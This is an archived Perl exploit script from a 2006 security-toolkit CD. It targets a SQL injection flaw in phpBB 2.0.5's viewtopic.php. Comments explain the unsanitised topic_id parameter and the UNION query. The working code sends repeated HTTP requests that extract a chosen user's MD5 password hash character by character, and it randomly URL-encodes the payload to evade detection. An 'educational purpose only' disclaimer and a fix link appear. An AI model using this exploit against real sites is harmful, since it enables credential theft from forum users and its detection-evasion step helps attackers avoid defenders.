home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / 2003.06.20.phpBB.2.0.5.pl < prev    next >
Perl Script  |  2005-02-12  |  4KB  |  133 lines

  1. #!/usr/bin/perl -w
  2. #
  3. #
  4. # phpBB password disclosure vuln.
  5. # - rick patel
  6. # There is a sql injection vuln which exists in /viewtopic.php file. The variable is $topic_id
  7. # which gets passed directly to sql server in query. Attacker could pass a special sql string which
  8. # can used to see md5 password hash for any user (!) for phpBB. This pass can be later used with
  9. # autologin or cracked using john. 
  10. #
  11. # Details: 
  12. #
  13. # this is checking done for $topic_id in viewtopic.php:
  14. #
  15. # if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
  16. # {
  17. # $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
  18. # }
  19. # else if ( isset($HTTP_GET_VARS['topic']) )
  20. # {
  21. # $topic_id = intval($HTTP_GET_VARS['topic']);
  22. # }
  23. #
  24. # ok... no else statement at end :)
  25. # now if GET[view]=newest and GET[sid] is set, this query gets executed:
  26. #
  27. # $sql = "SELECT p.post_id
  28. # FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
  29. # WHERE s.session_id = '$session_id'
  30. # AND u.user_id = s.session_user_id
  31. # AND p.topic_id = $topic_id
  32. # AND p.post_time >= u.user_lastvisit
  33. # ORDER BY p.post_time ASC
  34. # LIMIT 1";
  35. #
  36. # $topic_id gets passed directy to query. So how can we use this to do something important? Well
  37. # I decided to use union and create a second query will get us something useful. There were couple of 
  38. # problems i ran into. first, phpBB only cares about the first row returned. second, the select for first
  39. # query is p.post_id which is int, so int becomes the type returned for any other query in union. third,
  40. # there is rest of junk at end " AND p.post_time >= ..." We tell mysql to ignore that by placing /* at end
  41. # of our injected query. So what query can we make that returns only int? 
  42. # this one => select ord(substring(user_password,$index,1)) from phpbb_users where user_id = $uid
  43. # Then all we have to do is query 32 times which $index from 1-32 and we get ord value of all chars of
  44. # md5 hash password. 
  45. #
  46. # I have only tested this with mysql 4 and pgsql . Mysql 3.x does not support unions so you would have to tweak
  47. # the query to do anything useful. 
  48. # This script is for educational purpose only. Please dont use it to do anything else. 
  49. #
  50. # To Fix this bug : http://www.phpbb.com/phpBB/viewtopic.php?t=112052
  51.  
  52. use IO::Socket;
  53.  
  54. $remote = shift || 'localhost';
  55. $view_topic = shift || '/phpBB2/viewtopic.php';
  56. $uid = shift || 2;
  57. $port = 80;
  58.  
  59. $dbtype = 'mysql4'; # mysql4 or pgsql 
  60.  
  61.  
  62. print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";
  63.  
  64. $p = "";
  65.  
  66. for($index=1; $index<=32; $index++)
  67. {
  68. $socket = IO::Socket::INET->new(PeerAddr => $remote,
  69. PeerPort => $port,
  70. Proto => "tcp",
  71. Type => SOCK_STREAM)
  72. or die "Couldnt connect to $remote:$port : $@\n";
  73. $str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) .
  74.  "&view=newest" . " HTTP/1.0\n\n";
  75.  
  76. print $socket $str;
  77. print $socket "Cookie: phpBB2mysql_sid=1\n"; # replace this for pgsql or remove it
  78. print $socket "Host: $remote\n\n";
  79.  
  80. while ($answer = <$socket>)
  81. {
  82. if ($answer =~ /Location:.*\x23(\d+)/) # Matches the Location: viewtopic.php?p=<num>#<num>
  83. {
  84. $p .= chr ($1);
  85. }
  86. }
  87.  
  88. close($socket);
  89. }
  90.  
  91. print "\nMD5 Hash for uid $uid is $p\n";
  92.  
  93. # random encode str. helps avoid detection
  94. sub random_encode
  95. {
  96. $str = shift;
  97. $ret = "";
  98. for($i=0; $i<length($str); $i++)
  99. {
  100. $c = substr($str,$i,1);
  101. $j = rand length($str) * 1000;
  102.  
  103. if (int($j) % 2 || $c eq'')
  104. {
  105. $ret .= "%" . sprintf("%x",ord($c));
  106. }
  107. else
  108. {
  109. $ret .= $c;
  110. }
  111. }
  112. return $ret;
  113. }
  114.  
  115. sub make_dbsql
  116. {
  117. if ($dbtype eq 'mysql4')
  118. {
  119. return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
  120. } elsif ($dbtype eq 'pgsql')
  121. {
  122. return "; 
  123. select ascii(substring(user_password from $index for 1)) as 
  124. post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
  125. }
  126. else 
  127. {
  128. return "";
  129. }
  130. }
  131.